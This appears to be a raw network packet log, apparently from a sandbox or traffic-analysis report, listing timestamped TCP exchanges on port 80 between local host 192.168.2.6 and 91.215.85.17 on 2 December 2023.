                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757926941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757930994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757951021 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757973909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757976055 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758043051 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758054972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758081913 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758095026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758136988 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758155107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758167028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758181095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758192062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758203983 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758205891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758233070 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758287907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758301020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758315086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758326054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758327007 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758347034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758368015 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758378983 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758408070 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758419037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758439064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758445978 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758544922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758555889 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758567095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758577108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758582115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758589029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758599997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758600950 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758611917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758641005 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758656025 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758712053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758728027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758759022 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758760929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758778095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758810997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.758908033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.759032011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.759066105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.759088039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.759099960 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.759114981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.759139061 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.761817932 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.761918068 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970738888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970756054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970767021 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970781088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970791101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970845938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970860004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970871925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970913887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970925093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970936060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970947981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970947981 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970947981 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970947981 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970947981 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970973969 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.970980883 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971021891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971112967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971122980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971133947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971153021 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971153975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971165895 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971303940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971314907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971324921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971334934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971344948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971347094 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971355915 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971365929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971366882 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971379042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971390009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971400976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971401930 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971441984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971561909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971601009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971607924 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971612930 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971633911 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971652985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971698046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971738100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971750975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971761942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971780062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971791029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971801043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971805096 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971838951 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971848965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971860886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971888065 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971916914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971929073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.971956968 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972032070 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972071886 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972120047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972132921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972143888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972153902 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972160101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972170115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972172022 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972182035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972193003 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972203970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972213984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972220898 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972225904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972244024 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972270966 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972327948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972359896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972378016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972400904 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972846985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.972893000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973026991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973037958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973047972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973059893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973069906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973076105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973083019 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973093987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973094940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973104954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973114967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973121881 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973141909 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973155975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973167896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973177910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973195076 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973218918 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973222017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973229885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973248005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973277092 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973308086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973335028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973345995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973347902 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973356962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973368883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973378897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973381042 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973407984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973428011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973440886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973467112 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973500013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973510981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973535061 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973541021 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973562956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973581076 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973601103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973639011 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973668098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973679066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973687887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973706961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973726988 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973746061 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973784924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973797083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973808050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973834991 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973870039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973906994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973927021 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973938942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.973977089 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974014044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974025011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974061966 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974065065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974077940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974088907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974100113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974117994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974136114 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974174023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974184036 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974195004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974205971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974215984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974216938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974227905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974239111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974252939 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974276066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974277020 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974298000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974313974 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974343061 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974355936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974385977 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974400997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974421978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974433899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974437952 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974445105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974473000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974544048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974572897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974585056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974586010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974620104 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974662066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974680901 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974683046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974694967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974720001 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974736929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974759102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974776983 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974832058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974872112 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974900961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974934101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974972010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974982977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.974993944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975032091 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975052118 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975064993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975075960 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975085020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975095987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975102901 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975121975 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975178957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975189924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975198984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975209951 CET804972091.215.85.17192.168.2.6
